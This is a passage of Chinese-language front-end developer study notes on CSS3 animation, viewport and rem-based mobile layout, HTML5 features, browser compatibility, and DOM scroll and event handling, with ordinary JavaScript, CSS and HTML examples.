document.createElement('div') testElement.style.border = '.5px solid transparent' fakeBody.appendChild(testElement) docEl.appendChild(fakeBody) if (testElement.offsetHeight === 1) { docEl.classList.add('hairlines') } docEl.removeChild(fakeBody) } ``` ##### ***css3动画*** 属性名 | 描述 | - | - animation-name | 就是@keyframes的名字 animation-duration | 动画指定需要多少秒或毫秒完成 animation-timing-function | 动画执行的动作,比如匀速linear,还是ease等 animation-delay | 设置动画在启动前的延迟间隔。只有第一次有效 animation-iteration-count | 定义动画的播放次数,默认1次,始终为infinite animation-direction | 指定是否应该轮流反向播放动画。alternate是交替,reverse是反向 animation-fill-mode | 其实就是一个动画循环结束时要保持在哪个位置,forwords就是最后,backwords就是开始 animation-play-state | 指定动画是否正在运行running或已暂停pause。可以添加hover类让其暂停。 ```css @keyframes test { } ``` #### ***HTML相关*** ***link和@import区别*** - 从属关系,@import是 CSS 提供的语法规则,只有导入样式表的作用;link是HTML提供的标签,不仅可以加载 CSS 文件,还可以定义 RSS、rel 连接属性等。 - 加载顺序,加载页面时,link标签引入的 CSS 被同时加载;@import引入的 CSS 将在页面加载完毕后被加载。 - 兼容性区别,@import是 CSS2.1 才有的语法,故只可在 IE5+ 才能识别;link标签作为 HTML 元素,不存在兼容性问题。 - DOM可控性区别,可以通过 JS 操作 DOM ,插入link标签来改变样式;由于 DOM 方法是基于文档的,无法使用@import的方式插入样式。 ***router-link和a标签区别*** ```js const on = { click: (e) => { // 忽略带有功能键的点击 if (e.metaKey || e.ctrlKey || e.shiftKey) return // 已阻止的返回 if (e.defaultPrevented) return // 右击 if (e.button !== 0) return // `target="_blank"` 忽略 const target = e.target.getAttribute('target') if (/\b_blank\b/i.test(target)) return // 阻止默认行为 防止跳转 e.preventDefault() if (this.replace) { // replace 逻辑 router.replace(to) } else { // push 逻辑 router.push(to) } } } ``` ***viewport*** 首先,移动设备上的浏览器认为自己必须让所有的网站都能正常显示,即使是那些不是为移动设备设计的网站。。。那如何设置这个宽度呢?太窄了布局会错乱,太宽了会出现滚动条,什么又是不窄不宽呢? 因此有三种viewport来解决这些问题: 1. layout viewport (document.documentElement.clientWidth) 2. visual viewport (window.innerWidth) 3. ideal viewport (设备不同,值不同) `document`是文档对象,而`documentElement`属性以一个元素对象返回一个文档的文档元素。HTML 文档返回对象为HTML元素,其实就是html元素。 layout是为了防止太窄,布局出现错乱规定的一个较宽的值。layout viewport 的宽度是大于浏览器可视区域的宽度的,所以我们还需要一个viewport来代表浏览器可视区域的大小,这个viewport叫做 visual viewport;但越来越多的网站为移动设备单独设计,因此需要一个完美适配移动设备的viewport,也就是不能缩放,不能出现滚动条,不能显示异常等。。。这个viewport就是ideal viewport,也就是理想viewport。 ideal viewport并不是一个固定的尺寸,不同的设备拥有不同的ideal viewport。所有的iphone的ideal viewport宽度都是320px,无论它的屏幕宽度是320还是640,也就是说,在iphone中,css中的320px就代表iphone屏幕的宽度。 是安卓设备就比较复杂了,有320px的,有360px的,有384px的等等,具体可参考:[各设备的理想viewport][androidViewportWidthSizeUrl] ***利用meta控制viewport*** 移动设备默认的viewport是layout viewport,也就是那个比屏幕要宽的viewport,但在进行移动设备网站的开发时,我们需要的是ideal viewport。那么怎么才能得到ideal viewport呢?这就该轮到meta标签出场了。 meta viewport 标签首先是由苹果公司在其safari浏览器中引入的,目的就是解决移动设备的viewport问题。后来安卓以及各大浏览器厂商也都纷纷效仿,引入对meta viewport的支持 ```html <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> ``` 该meta标签的作用是让当前viewport的宽度等于设备的宽度(此时viewport的宽度就是ideal viewport宽度了),同时不允许用户手动缩放。也许允不允许用户缩放不同的网站有不同的要求,但让viewport的宽度等于设备的宽度,这个应该是大家都想要的效果,如果你不这样的设定的话,那就会使用那个比屏幕宽的默认viewport,也就是说会出现横向滚动条。 **注意:**在iphone和ipad上,无论是竖屏还是横屏,宽度都是竖屏时ideal viewport的宽度。 ```html <meta name="viewport" content="width=device-width"> <meta name="viewport" content="initial-scale=1"> ``` 其实上面两种写法效果一样,都可以把当前的viewport变为ideal viewport。这是因为`initial-scale=1`只是不对当前页面缩放。。。但我们需要知道这个缩放是相对于谁的?答案就是`ideal viewport`,因此相对于ideal viewport缩放是1,不正好就是ideal viewport的宽度了。。。 那如果出现下面二者同时存在情况呢? ```html <meta name="viewport" content="width=400, initial-scale=1"> ``` 答案是取二者中最大值。。。比如这里ideal viewport是480px,则取480px; **总结:**最后,总结一下,要把当前的viewport宽度设为ideal viewport的宽度,既可以设置 width=device-width,也可以设置 initial-scale=1,但这两者各有一个小缺陷,就是iphone、ipad以及IE会横竖屏不分,通通以竖屏的ideal viewport宽度为准。所以,最完美的写法应该是,两者都写上去,这样就 initial-scale=1 解决了 iphone、ipad的毛病,width=device-width则解决了IE的毛病(IE不认initial-scale属性): ```html <meta name="viewport" content="width=device-width, initial-scale=1.0"/> ``` ***关于缩放及initial-scale的默认值*** 前面我们知道缩放是相对于 `ideal viewport`的,缩放值越大,当前的viewport的宽度就越小。比如在iphone中,ideal viewport的宽度是320px,如果设置`initial-scale=2`,此时viewport的宽度变为只有160px。。。感觉160比320小了,但是我们要知道,px是个动态单位,因此放大2倍后,1px相当于之前的2倍。。。 所以:visual viewport宽度 = ideal viewport宽度 / 当前缩放值 多数浏览器都符合这个理论,但是安卓上的原生浏览器以及IE有些问题。安卓自带的webkit浏览器只有在 initial-scale = 1 以及没有设置width属性时才是表现正常的,也就相当于这理论在它身上基本没用;而IE则根本不甩initial-scale这个属性,无论你给他设置什么,initial-scale表现出来的效果永远是1。 好了,现在再来说下 initial-scale 的默认值问题,就是不写这个属性的时候,它的默认值会是多少呢?很显然不会是1,因为当 initial-scale = 1 时,当前的 layout viewport 宽度会被设为 ideal viewport 的宽度,但前面说了,各浏览器默认的 layout viewport 宽度一般都是980啊,1024啊,800啊等等这些个值,没有一开始就是 ideal viewport 的宽度的,所以 initial-scale 的默认值肯定不是1。 **结论:**在iphone和ipad上,无论你给viewport设的宽的是多少,如果没有指定默认的缩放值,则iphone和ipad会自动计算这个缩放值,以达到当前页面不会出现横向滚动条(或者说viewport的宽度就是屏幕的宽度)的目的。 再来看看淘宝针对不同设备做的scale处理(其实主要针对的是iphone,adroid的一直为1): ```js var dpr = 0; var scale = 0; var match = document.querySelector('meta[name="viewport"]').getAttribute('content').match(/initial\-scale=([\d\.]+)/) if (match) { // 正则分组,获取match[1],也就是缩放比1 scale = parseFloat(match[1]); // scale大于1,dpr就为0 dpr = parseInt(1 / scale); } if (!dpr && !scale) { var isAndroid = win.navigator.appVersion.match(/android/gi); var isIPhone = win.navigator.appVersion.match(/iphone/gi); var devicePixelRatio = win.devicePixelRatio; if (isIPhone) { // iOS下,对于2和3的屏,用2倍的方案,其余的用1倍方案 if (devicePixelRatio >= 3 && (!dpr || dpr >= 3)) { dpr = 3; } else if (devicePixelRatio >= 2 && (!dpr || dpr >= 2)){ dpr = 2; } else { dpr = 1; } } else { // 其他设备下,仍旧使用1倍的方案 dpr = 1; } scale = 1 / dpr; } var doc = win.document; var docEl = doc.documentElement; docEl.setAttribute('data-dpr', dpr); if (!metaEl) { metaEl = doc.createElement('meta'); metaEl.setAttribute('name', 'viewport'); metaEl.setAttribute('content', 'initial-scale=' + scale + ', maximum-scale=' + scale + ', minimum-scale=' + scale + ', user-scalable=no'); if (docEl.firstElementChild) { docEl.firstElementChild.appendChild(metaEl); } else { var wrap = doc.createElement('div'); wrap.appendChild(metaEl); doc.write(wrap.innerHTML); } } ``` 在高分屏下,dpr越大,scale越小。。。由公式:visual viewport宽度 = ideal viewport宽度 / 当前缩放值,可以得到visual viewport越大,这样便和设计稿尺寸吻合了,同一个图片在不同手机上看着就大小一样了。。。比如iphone6, ideal viewport宽度为320px,dpr为2,所以scale为0.5,visual port 就为320/0.5 = 640px,也就是设计稿的宽度,但为何设计稿的宽度都为750px呢? 参考:[淘宝具体实现flexible过程][taoBaoFlexibleUrl] ***rem思想:*** 这种方案受到vw这个单位的启发,100vw等于设备宽度,跟具体像素无关,有点类似100%。但百分比无法解决宽高比的问题。 rem单位是参照根节点的font-size为依据,所以只要根据设备宽度来除以100份,动态计算根节点的字体大小,就能hack这个vw的效果。 `1vw = (ClietWidth/100) = htmlFontSize = 1rem` flexible将页面分成了10份,为什么不像vw单位一样是100份呢?拿iPhone4举例,宽度为320px,如果是100份,1rem=3.2px,目前大部分浏览器不支持12px以下的字体大小,所以320/12=26.67,最多可以将页面分成26份,方便计算取整数10,1rem=(320/10)=32px。 ***rem布局*** ```js (function (doc, win) { var docEl = doc.documentElement, resizeEvt = 'orientationchange' in window ? 'orientationchange' : 'resize', recalc = function () { var clientWidth = docEl.clientWidth; if (!clientWidth) return; let array = navigator.userAgent.split("&"); // 还可以处理各个的兼容,比如华为P20手机兼容 if(navigator.userAgent.indexOf("HUAWEIEML-AL00") >= 0 && array.length >=2){ clientWidth = 313; } // 屏幕宽为750px时,1rem = 100px; // iphone8屏幕宽为375px,1rem = 50px; // 而我们公司的设计稿就是按750px的尺寸做的,因此可以直接转换 // 比如 10px 就是 0.1rem docEl.style.fontSize = 100 * (clientWidth / 750) + 'px'; }; if (!doc.addEventListener) return; win.addEventListener(resizeEvt, recalc, false); doc.addEventListener('DOMContentLoaded', recalc, false); })(document, window); // 移动端时,在input或textarea获取焦点后,一般会软键盘弹起 // 为了防止软键盘挡住input或textarea,可以设置input或textarea自动滚动到可视区域 if ( isMobile ) { if ( ios_version.length > 1 && parseInt( ios_version[ 0 ] ) >= 11 ) { //ios 11 以上先不执行 } else { document.body.addEventListener( 'click', function ( event ) { var element = event.target; var tags = { 'INPUT': 1, 'TEXTAREA': 1, }; if ( ( element.tagName in tags ) ) { setTimeout( function () { // 将不在浏览器窗口的可见区域内的元素滚动到浏览器窗口的可见区域。 // 如果该元素已经在浏览器窗口的可见区域内,则不会发生滚动。 element.scrollIntoViewIfNeeded(); }, 400 ); } }, false ); } // ios机型上,由于软键盘弹起造成界面整体上移,软键盘收起时又没有及时拉回,导致点击按钮失效, ;(/iphone|ipod|ipad/i.test(navigator.appVersion)) && document.addEventListener('blur', (e) => { // 这里加了个类型判断,因为a等元素也会触发blur事件 // scrollIntoView(false),false表示元素的底端将和其所在滚动区的可视区域的底端对齐 ['input', 'textarea'].includes(e.target.localName) && document.body.scrollIntoView(false) }, true) ``` Chrome排版引擎现在是blink,这一点从哪里可以看到呢?我在76版本Chrome的navigator属性值里只看到了AppleWebkit,这是为什么? UserAgent,又称为UA,UA是浏览器的身份证,通常,在发送HTTP请求时,UA会附带在HTTP的请求头中user-agent字段中,这样服务器就会知道浏览器的基础信息,然后服务器会根据不同的UA返回不同的页面内容,比如手机上返回手机的样式,PC就返回PC的样式。 服务器会根据不同的UA来针性的设计不同页面,所以当出了一款新浏览器时,他如果使用自己独一无二的UA,那么之前的很多服务器还需要针对他来做页面适配,这显然是不可能的,比如Chrome发布时他会在他的UA中使用“Mozilla” ,“AppleWebKit”,等关键字段,用来表示他同时支持Mozilla和AppleWebKit,然后再在最后加上他自己的标示,如Chrome/xxx。 UserAgent构成:https://www.jianshu.com/p/c5cf6a1967d1 UserAgent解析:https://www.jianshu.com/p/2f99f007dc14 ***常见html问题点*** ```js // charset是定义的外部脚本文件中所使用的字符编码 // type规定脚本的MIME类型,媒介类型/子类型 // html5规范中,现代浏览器默认的脚本就是javascript,所以如果标签内是js可以省略,但是如果不是js就需要添加 <script type="text/javascript" src="myscripts.js" charset="UTF-8"></script> ``` 其实:MIME是多用途Internet邮件扩展(Multipurpose Internet Mail Extensions)类型 ,由类型与子类型两个字符串,中间用'/'分割而组成,不允许空格。 语法结构:type/subtype 1. text 表明文件是普通文本,理论上是人类可读,text/plain, text/html, text/css, text/javascript 2. 表明是某种图像。不包括视频,但是动态图(比如动态gif)也使用image类型 image/gif, image/png, image/jpeg, image/bmp, image/webp, image/x-icon, image/vnd.microsoft.icon 3. audio 表明是某种音频文件,audio/midi, audio/mpeg, audio/webm, audio/ogg, audio/wav 4. video 表明是某种视频文件,video/webm, video/ogg 5. application 表明是某种二进制数据 application/octet-stream, application/pkcs12, application/vnd.mspowerpoint, application/xhtml+xml, application/xml, application/pdf 上面是对立类型,其实还有Multipart类型,如`multipart/form-data` `multipart/byteranges`等。Multipart 类型表示细分领域的文件类型的种类,经常对应不同的 MIME 类型。这是复合文件的一种表现方式。multipart/form-data 可用于联系 HTML Forms 和 POST 方法, ***常用布局方式*** **flex:** 采用flex布局的元素,自动称为felx容器(flex contanier),而所有的子元素自动称为容器成员(flex item) - flex-direction 伸缩流方向 `(row横(默认值) | row-reverse | column |column-reverse)` - flex-wrap 伸缩-换行 `(nowrap(默认值) | wrap | wrap-reverse)` - justify-content 主轴对齐及空间分配 `(flex-start(默认值) | flex-end | center |space-between | space-around | space-evenly)` - align-items 侧轴上项目对齐方式 `(stretch(默认值) | center | flex-end | baseline | flex-start)` - align-content 堆栈伸缩行 `(stretch(默认值) | flex-start | center |flex-end | space-between | space-around | space-evenly)` - align-self 侧轴上单个项目对齐方式 - flex 伸缩性 - flex-basis 伸缩-基准值 - flex-flow伸缩流的方向与换行 - flex-grow伸缩-扩展基数 - flex-shrink 伸缩-收缩比率 - order 伸缩-顺序 ```js // flex实现table高度自适应 // 比如页面里有两个部分,头部和table,要求table高度自适应 // 可以对父元素设置如下(注意height:100%需要显式指定): display:flex; flex-direction:column; height:100%; // 然后table元素设置如下: flex: 1; // 其实就是按比例自适应填满剩余空间 // 当然还有种方式,就是利用ccs变量 // 头部高度计算出来,然后table的高度:calc(100% - var(--topHeight)) ``` #### ***CSS相关*** ***css权重*** ```js // !important > 行内样式 > ID选择器 > 类选择器 | 属性选择器 | 伪类选择器 > 元素选择器 ``` ***margin collapsing*** **块级元素**的**上外边距和下外边距**有时会合并(或折叠)为一个外边距,其**大小取其中大者**,可理解为外边距折叠或外边距合并,**浮动元素和绝对定位元素的外边距不会折叠** 几种折叠场景: 1. 相邻元素之间(除非后面的元素清除之前的浮动) 2. 父元素与其第一个或最后一个子元素之间 3. 空的块级元素 其实说到底,只要margin-bottom和margin-top之间没有**一些东西**隔开,就会发生合并。。。而这里的**一些东西**可以是:边框、内边距、行内内容、height、min-height 等。 参考:[margin合并(mdn)][marginCollapsingUrl] ***一些css技巧*** 参考:[css常用选择器(w3c)][w3choolCssSelectorUrl] ```css /* 同时选中在(父元素的)子元素列表中,最后一个给定类型的元素p和a元素 */ p, a:last-of-type { margin-bottom: 0; } ``` #### ***HTML5及CSS3相关*** 参考:[HTML5(mdn)][html5MdnUrl]、[h5和css3新特性一览][html5&css3NewFeatureUrl]、[前端工程师手册][frontEndDatabaseUrl] **HTML5**: 1. 一个新版本的html语言,具有新的元素,属性和行为 2. 有更大的技术集,允许更多多样化和强大的网站和应用程序。 主要改变有以下几个方面: 1. 语义 2. 通信 3. 离线 & 存储 4. 多媒体 5. 2d/3d 图形和效果 6. 性能和集成 7. 设备访问 8. 样式设计 **语义**: 1. 语义之新区块和段落元素`<section>, <article>, <nav>, <header>, <footer>, <aside> 和 <hgroup>.`能让你更恰当地描述你的内容是什么 2. `<audio> 和 <video> `元素嵌入和允许操作新的多媒体内容。 3. 表单改进,强制校验API,一些新的属性,一些新的`<input>` 元素type属性值(`placeholder,required,pattern,min,max,step,autofocus,multiple`) ,新的`<output>`元素。 4. 新的语义元素,除了上面的,还有例如` <mark>, <figure>, <figcaption>, <data>, <time>, <output>, <progress>, 或者 <meter>和<main>`,这增加了有效的 HTML5 元素的数量。 **什么是语义化?就是用合理、正确的标签来展示内容,比如h1~h6定义标题。** - 易于用户阅读,样式丢失的时候能让页面呈现清晰的结构。 - 有利于SEO,搜索引擎根据标签来确定上下文和各个关键字的权重。 - 方便其他设备解析,如盲人阅读器根据语义渲染网页 - 有利于开发和维护,语义化更具可读性,代码更好维护,与CSS3关系更和谐。 - 用户体验:例如title、alt用于解释名词或解释图片信息、label标签的活用; **通信**: 1. `webSocket`是h5开始提供的一种在单个tcp连接上进行全双工通讯的协议; 2. `WebRTC`即时通信,允许连接到其他人,直接在浏览器中控制视频会议,而不需要一个插件或是外部的应用程序。 3. `Server-sent events(SSE)`允许服务器向客户端推送事件,而不是仅在响应客户端请求时服务器才能发送数据的传统范式。 **离线 & 存储**: 参考:[indexedDB(阮一峰)][indexedDB(ruanyifeng)] 1. 离线资源(应用程序缓存),火狐全面支持离线资源规范,其他浏览器部分支持、 2. Firefox 3 支持 WHATWG 在线和离线事件,这可以让应用程序和扩展检测是否存在可用的网络连接,以及在连接建立和断开时能感知到。 3. Web Storage存储(sessionStorage,localStorage)让web应用程序在客户端存储结构化数据 4. indexedDB在浏览器中存储大量结构化数据,并且能够在这些数据上使用索引进行高性能检索 ***注意:*** 1. window.sessionStorage是会话期间(关闭标签会话即结束(vue项目测试的),刷新后也有效) 2. LocalStorage 在 2.5MB 到 10MB 之间(各家浏览器不同),而且不提供搜索功能,不能建立自定义的索引。 3. Cookie的大小不超过4kb,且每次请求都会发送回服务器,浏览器不同,每个域下cookie的数量20个左右 4. IndexedDB 不属于关系型数据库(不支持 SQL 查询语句),更接近 NoSQL,MongoDB等非关系型数据库。 5. 关系型是指采用关系模型(二维表格模型)组织数据的数据库,具有事务一致性(任何人看到的数据都一致),也因此读写性能稍差 6. 非关系型大多开源,大多以键值对存储,且结构不固定,每一个元组可以有不一样的字段,每个元组可以根据需要增加一些自己的键值对,这样就不会局限于固定的结构,可以减少一些时间和空间的开销。 **多媒体**: 1. `<audio> 和 <video> `元素嵌入并支持新的多媒体内容的操作。 2. 使用 Camera API,允许使用,操作计算机摄像头,并从中存储图像。 **媒体类型(Media type)** 媒体类型是一个常见的属性,可以通过媒体类型对不同的设备指定不同的样式。 常见的几种:link标签、xml方式、@import方式、@media方式 ```html <link rel="stylesheet" type="text/css" href="style.css" media="screen"/> @media screen {} @media screen and (max-width:600px) {} <!-- 根据设备屏幕的输出宽度设置相应的样式 --> <link rel="stylesheet" media="screen and (max-device-width:480px)" href="iphone.css"/> ``` **2d/3d 图形和效果**: 1. canvas 2. WebGL 通过引入了一套非常地符合 OpenGL ES 2.0 并且可以用在 `HTML5<canvas>`元素中的 API 给 Web 带来了 3D 图像功能。 3. 一个基于 XML(Extensible Markup Language,可扩展标记语言,设计之初用来传输和存储数据,而html用来显示数据) 的可以直接嵌入到 HTML 中的矢量图像格式。 **XML 、 HTML 、XHTML** 通常把通过添加标签为数据赋予意义的行为称为“标记”。为这种 给数据赋予意义的行为定义规则的语言就是“标记语言” - 在 HTML 中,我们只能使用由 HTML 定义出的那若干种标签, 因此 HTML 是固定的标记语言。但XML 的使用者随心所欲地创建标签。 也就是说,在“<”和“>”中的单词可以是任意的 - XML 并没有限定标签的使用方式,使用什么样的标签都可以。可 以说 XML 仅仅限定了进行标记时标签的书写格式(书写风格)。也就 是说通过定义要使用的标签种类,就可以创造出一门新的标记语言。 **通常把这种用于创造语言的语言称作“元语言”**。例如,我们可以使用 <dog> 和 <cat> 等标签,创造一种属于自己的标记语言——宠物语言 - HTML 中规定的各种标签只能用来指定信息的呈现样式,而不能表示信息的含义。 有效的 XML 文档包含3部分: - XML 声明 ,XML 文档开 头的、形如 `<?xml version="1.0" encoding="Shift_JIS"?>` 的部分 - XML 实例,文档中通过标签被标记的部分 - DTD (Document Type Definition,文档类型描述),而 DTD 的作用是定义 XML 实 例的结构。虽然也可以省略 DTD,但是通过 DTD 可以严格地检查 XML 实例的内容是否有效。 处理 XML 文档的程序组件,比如已成为 W3C 标 准的 DOM(Document Object Model,文档对象模型)以及由 XML-dev 社区开发的 SAX(Simple API for XML)。其实无论是 DOM 还是 SAX,都只是组件的规范,实际的组件是由某个厂商或社区提供的。如果使用的是 Windows,那么就应该已经安装了一个由微软提供 的、遵循了 DOM 规范的组件(一个名为 msxml3.dll 的 DLL 文件)。 **性能和集成**: 1. web workers可以把js运算委托给后台线程,通过允许这些活动以防止使交互型事件变得缓慢 2. 即时编译的js引擎功能更加强大,性能更杰出 3. History API允许对浏览器历史记录进行操作 4. contentEditable 属性:把你的网站改变成 wiki ! 5. 拖放,HTML5 的拖放 API 能够支持在网站内部和网站之间拖放项目。 6. requestAnimationFrame下次重绘之前调用指定的回调函数更新动画以获得更优性能 7. 全屏API,选择全屏展示的元素(如:video,html等),调用Ele.requestFullscreen() 8. 在线和离线事件,navigator.onLine为true表示在线,否则离线 ```js // 1. 时间间隔并不好拿捏,设置太短浏览器重绘频率太快会产生性能问题,太慢的话又显得像PPT不够平滑,业界推荐的时间间隔是16.66...(显示器刷新频率是60Hz,1000ms/60) // 2. 浏览器UI线程堵塞问题,如果UI线程之中有很多待完成的渲染任务,所要执行的动画就会被搁置。 // 模拟requestAnimationFrame let lastTime = 0; if ( !window.requestAnimationFrame ) { window.requestAnimationFrame = function ( callback, element ) { var currTime = new Date().getTime(); var timeToCall = Math.max( 0, 16 - ( currTime - lastTime ) ); var id = window.setTimeout( function () { callback( currTime + timeToCall ); }, timeToCall ); lastTime = currTime + timeToCall; return id; }; } // 浏览器自动 var start = null; var element = document.getElementById('SomeElementYouWantToAnimate'); // element.style.position = 'absolute'; function step(timestamp) { if (!start) start = timestamp; var progress = timestamp - start; element.style.left = Math.min(progress / 10, 200) + 'px'; if (progress < 2000) { window.requestAnimationFrame(step); } } // 利用浏览器的刷新频率自动执行step函数,其实相当于定时器 window.requestAnimationFrame(step); ``` **设备访问**: 1. 使用 Camera API,允许使用,操作计算机摄像头,并从中存储图像。 2. 对于用户按下触控屏的事件作出反应的处理程序 3. 地理位置定位navigator.geolocationt对象提供,返回低精度位置 ```js // getCurrentPosition是异步操作,回调函数对返回的数据进行处理 navigator.geolocation.getCurrentPosition(function(position) { do_something(position.coords.latitude, position.coords.longitude); }); ``` 1. 检测设备方向。 ```js // DeviceOrientationEvent是加速度传感器检测到设备在方向上发生变化时触发 window.addEventListener("deviceorientation", handleOrientation, true); // DeviceMotionEvent是监听的加速度变化而不是方向 window.addEventListener("devicemotion", handleMotion, true); ``` **样式设计**: 1. `box-shadow`设置边框阴影,还可以设置多背景 2. `border-image`边框图片,`border-radius`设置圆角 3. css Transitions/Transform/@keyframes 4. @font-face规则自定义字体,多个src确保支持多种浏览器 5. 多栏布局及css灵活方框布局 ***主流浏览器兼容性*** - 各浏览器默认样式不同(可用Normalize.css抹平,或margin:0;padding:0但误伤较多) - ie9以下不识别HTML5标签(可用条件注释引入html5shiv.js) ```html <!-- 注意:条件注释只适用于IE --> <!-- lt小于、gt大于、lte小于等于、gte大于等于、!不等于 --> <!--[if lt IE 9]> <script type="text/javascript" src="https://cdn.bootcss.com/html5shiv/3.7.3/html5shiv.min.js"></script> <![endif]--> ``` - 浏览器css兼容前缀(o(Opera)、ms(IE)、moz(Firefox)、webkit(Chrome、Safari、新版Opera)) - 页面滚动高度,二者只会同时有一个有值 ```js // 获取窗体的高度 var windowHeight = window.innerHeight // 前者主要兼容pc端,后者主要针对移动端 var scroll_Top = document.documentElement.scrollTop || document.body.scrollTop; // scrollingElement 新标准,标准模式下返回document.documentElement // 怪异模式下,返回body,因此可以不用再像上面写两个了(注意兼容) // 在ie9之后的浏览器(pc及移动),垂直方向的偏移 var ie_scroll_top = window.pageYOffset // 获取元素高度:clientHeight不包括边框 // offsetHeight包括边框且获取的是整数位,还有ele.getBoundingClientRect().height这个可以精确到小数位,都兼容ie6+ // 获取元素滚动高度:scrollTop即可 // 精确获取页面元素位置的方式getBoundingClientRect(),它返回一个对象,其中包含了left、right、top、bottom四个属性,分别对应了该元素的左上角和右下角相对于浏览器窗口(viewport)左上角的距离。 // 判断页面滚动到底部 window.addEventListener('scroll', () => { // 滚动条在Y轴上的滚动距离 var scrollTop = document.documentElement.scrollTop || document.body.scrollTop; // 文档的总高度 var scrollHeight = document.documentElement.scrollHeight || document.body.scrollHeight; // 浏览器视口的高度 var clientHeight = document.documentElement.clientHeight || document.body.clientHeight; // 以上都用了两种, 其实可以直接使用document.scrollingElement // 滚动距离+窗口高度 == 文档的总高度 if(scrollTop + clientHeight == scrollHeight){ console.log('到底部了') } }) // 元素滚动到页面的指定位置, // 首先需要根据e.target找到滚动的元素,然后用该元素调用scrollTo(xpos,ypos) // 有个库Scrollparent,专门用来找滚动元素,但效果待验证。。。 // 原理:找到传入的元素的祖先元素,然后判断祖先元素的overflow相关的属性值,若属性值包含auto或scroll就为滚动元素。 // 当前的元素滚动到浏览器窗口的可视区域内。 Element.scrollIntoView() // 参数有三种方式 element.scrollIntoView(); // 等同于element.scrollIntoView(true) element.scrollIntoView(alignToTop); // Boolean型参数 element.scrollIntoView(scrollIntoViewOptions); // Object型参数 // 如果为true,元素的顶端将和其所在滚动区的可视区域的顶端对齐。 相应的 scrollIntoViewOptions: {block: "start", inline: "nearest"}。这是这个参数的默认值。 // 如果为false,元素的底端将和其所在滚动区的可视区域的底端对齐。相应的scrollIntoViewOptions: {block: "end", inline: "nearest"}。 // scrollIntoViewOptions包含三个选项: // behavior,定义动画过渡效果, "auto"或 "smooth" 之一。默认为 "auto"。 // block,定义垂直方向的对齐, "start", "center", "end", 或 "nearest"之一。默认为 "start"。 // inline,定义水平方向的对齐, "start", "center", "end", 或 "nearest"之一。默认为 "nearest"。 // 一般项目里直接,使用如下即可 Element.scrollIntoView({ behavior: 'smooth' }) // 下拉刷新 // 1. 当前手势滑动位置与初始位置差值大于零时,提示正在进行下拉刷新操作; // 2. 下拉到一定值时,显示松手释放后的操作提示; // 3. 下拉到达设定最大值松手时,执行回调,提示正在进行更新操作。 ( function ( window ) { var _element = document.getElementById( 'refreshContainer' ), _refreshText = document.querySelector( '.refreshText' ), _startPos = 0, _transitionHeight = 0; _element.addEventListener( 'touchstart', function ( e ) { console.log( '初始位置:', e.touches[ 0 ].pageY ); _startPos = e.touches[ 0 ].pageY; _element.style.position = 'relative'; _element.style.transition = 'transform 0s'; }, false ); _element.addEventListener( 'touchmove', function ( e ) { console.log( '当前位置:', e.touches[ 0 ].pageY ); _transitionHeight = e.touches[ 0 ].pageY - _startPos; if ( _transitionHeight > 0 && _transitionHeight < 60 ) { _refreshText.innerText = '下拉刷新'; _element.style.transform = 'translateY(' + _transitionHeight + 'px)'; if ( _transitionHeight > 55 ) { _refreshText.innerText = '释放更新'; } } }, false ); _element.addEventListener( 'touchend', function ( e ) { _element.style.transition = 'transform 0.5s ease 1s'; _element.style.transform = 'translateY(0px)'; _refreshText.innerText = '更新中...'; // todo... }, false ); } )( window ); // e.screenX 是鼠标距离物理屏幕左边缘的距离 // e.clientX 是鼠标距离页面左边缘的距离 ``` - 绑定事件/移除事件/阻止默认事件/阻止冒泡/消除滚动及滚轮事件 ```js // 给窗体绑定滚动事件,直接给window添加就行(document有兼容,body及documentElement不反应) window.addEventListener('scroll',function(){ console.log('window滚动了') // 有效 }) document.addEventListener("scroll",function(){ console.log[("document滚动了") // 有效 }) document.body.addEventListener("scroll",function(){ console.log("body滚动了") // 无效 }) document.documentElement.addEventListener("scroll",function(){ console.log("html滚动了") // 无效 }) [document,window,document.documentElement,document.body].forEach(function(item){ item.addEventListener('scroll',function(){ console.log(`${item} 滚动了`) }) }) { // 添加事件句柄 addHandler: function(elem, type, listener) { if (elem.addEventListener) { elem.addEventListener(type, listener, false); } else if (elem.attachEvent) { elem.attachEvent('on' + type, listener); } else { // 在这里由于.与'on'字符串不能链接,只能用 [] elem['on' + type] = listener; } }, // 移除事件句柄 removeHandler: function(elem, type, listener) { if (elem.removeEventListener) { elem.removeEventListener(type, listener, false); } else if (elem.detachEvent) { elem.detachEvent('on' + type, listener); } else { elem['on' + type] = null; } }, // 取消默认行为 preventDefault: function(event) { if (event.preventDefault) { event.preventDefault(); } else { event.returnValue = false; } }, // 阻止事件冒泡 stopPropagation: function(event) { if (event.stopPropagation) { event.stopPropagation(); } else { event.cancelBubble = true; } }, // 阻止滚动及滚轮事件 stopScrollAndMousewheel: function(e){ ['scroll','mousewheel'].forEach((item) => { window.addEventListener(item,(e) => { e.preventDefault && e.preventDefault(); e.returnValue = false; // 已废除(但有旧浏览器支持),用e.preventDefault()代替 e.stopPropagation && e.stopPropagation(); return false; }) }) }, } ``` ***passive特性*** Web开发者通过一个新的属性passive来告诉浏览器,当前页面内注册的事件监听器内部是否会调用preventDefault函数来阻止事件的默认行为,以便浏览器根据这个信息更好地做出决策来优化页面性能。当属性passive的值为true的时候,代表该监听器内部不会调用preventDefault函数来阻止默认滑动行为,Chrome浏览器称这类型的监听器为被动(passive)监听器。 addEventListener可以传递第三个参数{passive: true},它表示 listener 永远不会调用 preventDefault()。如果 listener 仍然调用了这个函数,客户端将会忽略它并抛出一个控制台警告。 其实就是告诉浏览器,我的事件里不会调用preventDefault,你就大胆滚动就好了。即使调用了,也不会阻断程序运行。但这个特性还不能完全兼容,需要配合下面的polyfill,对于不支持的浏览器,传false(冒泡阶段触发,默认值)或true即可。 ```js // Test via a getter in the options object to see // if the passive property is accessed // supportsPassive.js export let supportsPassive = false if (typeof window !== 'undefined') { supportsPassive = false try { var opts = Object.defineProperty({}, 'passive', { get () { supportsPassive = true }, }) window.addEventListener('test', null, opts) } catch (e) {} } // Use our detect's results. // passive applied if supported, capture will be false either way. import { supportsPassive } from './supportsPassive'; elem.addEventListener( 'scroll', fn, supportsPassive ? { passive: true } : false ); ``` ***blob*** 二进制大对象接口(Blob)属于 HTML5 的 File API,就像一个不 透明的引用,可以指向任何数据块(二进制或文本)。这个对象本身没有太 多功能,只能查询其大小、MIME 类型,或将它切分成更小的块。这个对 象存在的真正目的,是作为各种 JavaScript API 之间的一种高效的互操作 机制。 js本身是没有处理二进制的能力的,但是可以通过js中的`ArrayBuffer和 Blob`来达到操作二进制的目的。 Blob 